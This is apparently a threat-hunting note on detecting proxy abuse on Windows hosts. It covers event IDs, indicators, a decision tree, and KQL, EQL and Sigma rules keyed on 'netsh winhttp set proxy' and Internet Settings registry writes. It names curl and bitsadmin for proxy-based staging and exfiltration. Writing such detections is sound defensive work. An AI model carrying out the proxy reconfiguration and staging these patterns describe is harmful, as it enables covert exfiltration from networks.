This note documents detection patterns related to Proxy Abuse within Windows environments.
Direct Indicators
| Log | Event ID | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Sysmon | 3 | Network connection | Critical | Detects outbound connections via proxy clients or proxy-aware tools. |
| Security | 4688 | Process creation | Critical | Detects proxy tooling and proxy-enabled commands. |
| Sysmon | 1 | Process creation | Critical | Best lineage source for proxy abuse chains. |
| Sysmon | 13 | Registry value set | High | Proxy settings modified in registry. |
| Sysmon | 22 | DNS query | High | Proxy destinations and relays. |
| PowerShell | 4104 | Script block logging | Critical | Proxy settings in PowerShell visible here. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| Proxy registry changed | Internet Settings modified | Critical | Core proxy abuse primitive. |
| netsh winhttp proxy set | System proxy altered | Critical | Strong signal. |
| curl / bitsadmin uses proxy | Exfil or staging | Critical | Common operator path. |
| Unusual outbound via local proxy | localhost relay | High | Stealth clue. |
| Proxy immediately before download | Strong staging sequence | Critical | High-confidence chain. |
| Proxy reverted after use | Cleanup behavior | High | Skilled operator sign. |
Common Tools
| Tool | Usage |
|---|---|
| netsh | WinHTTP proxy config |
| PowerShell | Proxy object creation |
| curl.exe | Proxy-aware transfer |
| bitsadmin | Proxy-aware staging |
Relevant Artifacts
- Sysmon Event IDs 3, 1, 13, 22
- Security Event ID 4688
- PowerShell 4104
- Registry paths:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
- Commands:
netsh winhttp set proxy
- Prefetch:
NETSH.EXECURL.EXE
MITRE ATT&CK References
- T1090 Proxy
Decision Tree
-
Which proxy type?
- WinHTTP
- User proxy
- Tool-level proxy
-
Registry or command?
- netsh
- PowerShell
- Registry edit
-
Follow-on action?
- Download
- Beacon
- Exfil
-
Reverted later?
- Yes
- No
-
Expand:
- DNS
- Outbound chain
- Payload path
-
Scope:
- Single use
- Persistent relay
- Campaign behavior
Example Detection Templates
KQL
SecurityEvent
| where EventID == 4688
| where CommandLine has_any ("netsh winhttp set proxy","proxy")
| project TimeGenerated, Computer, CommandLine
Sysmon
| where EventID == 13
| where TargetObject has "Internet Settings"
| project TimeGenerated, Computer, TargetObject, Details
EQL
process where process.command_line like "*set proxy*"
sequence by host.name with maxspan=5m
[ process where process.name == "netsh.exe" ]
[ network where true ]
Sigma
title: Proxy Abuse Detection
id: 2d4b8f16-proxy-abuse
status: experimental
description: Detects suspicious proxy configuration changes
references:
- https://attack.mitre.org/
author: Vergil
date: 2026-03-07
logsource:
product: windows
service: security
detection:
selection:
EventID: 4688
keywords:
CommandLine|contains:
- 'set proxy'
- 'winhttp'
condition: selection and keywords
fields:
- CommandLine
falsepositives:
- Legitimate proxy administration
level: high
tags:
- attack.command_and_control
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| Alert on proxy changes | Strong signal | Critical | Core visibility |
| Watch Internet Settings writes | Valuable context | High | Low noise |
| Correlate proxy + transfer | High-confidence chain | Critical | Strong triage |
| Restrict netsh usage | Reduce abuse | High | Prevent reconfiguration |
| Preserve 4104 | Catch scripted proxy setup | High | Valuable evidence |